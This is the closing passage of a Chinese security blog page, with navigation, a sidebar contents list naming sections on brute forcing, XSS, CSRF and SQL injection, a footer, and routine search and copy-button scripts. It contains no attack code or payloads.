                <i class="fa fa-chevron-left"></i> Linux桌面美化
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/12/13/Apache-log4j2-rce（CVE-2021-44228）/" rel="prev" title="Apache log4j2 rce（CVE-2021-44228）">
                Apache log4j2 rce（CVE-2021-44228） <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  
  <div>
	
		<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">---------------The  End---------------</div>
    
</div>
	
  </div>
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">LoongEyes</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">84</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">18</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">19</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          

          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#暴力破解"><span class="nav-number">1.</span> <span class="nav-text">暴力破解</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#基于表单的暴力破解"><span class="nav-number">1.1.</span> <span class="nav-text">基于表单的暴力破解</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#验证码绕过（on-server）"><span class="nav-number">1.2.</span> <span class="nav-text">验证码绕过（on server）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#验证码绕过（on-client）"><span class="nav-number">1.3.</span> <span class="nav-text">验证码绕过（on client）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#token防爆破"><span class="nav-number">1.4.</span> <span class="nav-text">token防爆破</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#XSS"><span class="nav-number">2.</span> <span class="nav-text">XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#反射型XSS（get）"><span class="nav-number">2.1.</span> <span class="nav-text">反射型XSS（get）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#反射型XSS（post）"><span class="nav-number">2.2.</span> <span class="nav-text">反射型XSS（post）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#存储型XSS"><span class="nav-number">2.3.</span> <span class="nav-text">存储型XSS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DOM型XSS"><span class="nav-number">2.4.</span> <span class="nav-text">DOM型XSS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DOM型XSS-x"><span class="nav-number">2.5.</span> <span class="nav-text">DOM型XSS-x</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS盲打"><span class="nav-number">2.6.</span> <span class="nav-text">XSS盲打</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS之过滤"><span class="nav-number">2.7.</span> <span class="nav-text">XSS之过滤</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS之htmlspecialchars"><span class="nav-number">2.8.</span> <span class="nav-text">XSS之htmlspecialchars</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS之href输出"><span class="nav-number">2.9.</span> <span class="nav-text">XSS之href输出</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS之js输出"><span class="nav-number">2.10.</span> <span class="nav-text">XSS之js输出</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CSRF"><span class="nav-number">3.</span> <span class="nav-text">CSRF</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#CSRF（get）"><span class="nav-number">3.1.</span> <span class="nav-text">CSRF（get）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CSRF（post）"><span class="nav-number">3.2.</span> <span class="nav-text">CSRF（post）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CSRF（token）"><span class="nav-number">3.3.</span> <span class="nav-text">CSRF（token）</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL注入"><span class="nav-number">4.</span> <span class="nav-text">SQL注入</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#数字型注入（post）"><span class="nav-number">4.1.</span> <span class="nav-text">数字型注入（post）</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2024</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">LoongEyes</span>

  

  
</div>





<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共172.5k字</span>
</div>


<!--
<div style="width:400px;margin:0 auto; padding:20px 0;">
	<div style="display:inline-block;text-decoration:none;height:20px;line-height:20px;"><img src="/images/beiantubiao.png" alt="备案标识"/></div>
	<a target="_blank" href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=37010302000766" style="display:inline-block;text-decoration:none;height:20px;line-height:20px;"><img src="" style="float:left;"/><p style="float:left;height:20px;line-height:20px;margin: 0px 0px 0px 5px; color:#939393;">鲁公网安备 37010302000766号</p></a>
	<div style="display:inline-block;text-decoration:none;height:20px;line-height:20px;"><a target="_blank" href="http://beian.miit.gov.cn/" style="display:inline-block;text-decoration:none;height:20px;line-height:20px;"><p style="float:left;height:20px;line-height:20px;margin: 0px 0px 0px 5px; color:#939393;">鲁ICP备19025353号</p></a></div>
</div>
-->

        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>












  















  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



  










  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  
  

  

  

  

  

  
  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('复制').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
          if(result)$(this).text('复制成功')
          else $(this).text('复制失败')
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('复制')
        }, 300)
      }).append(e)
    })
  </script>


</body>
</html>
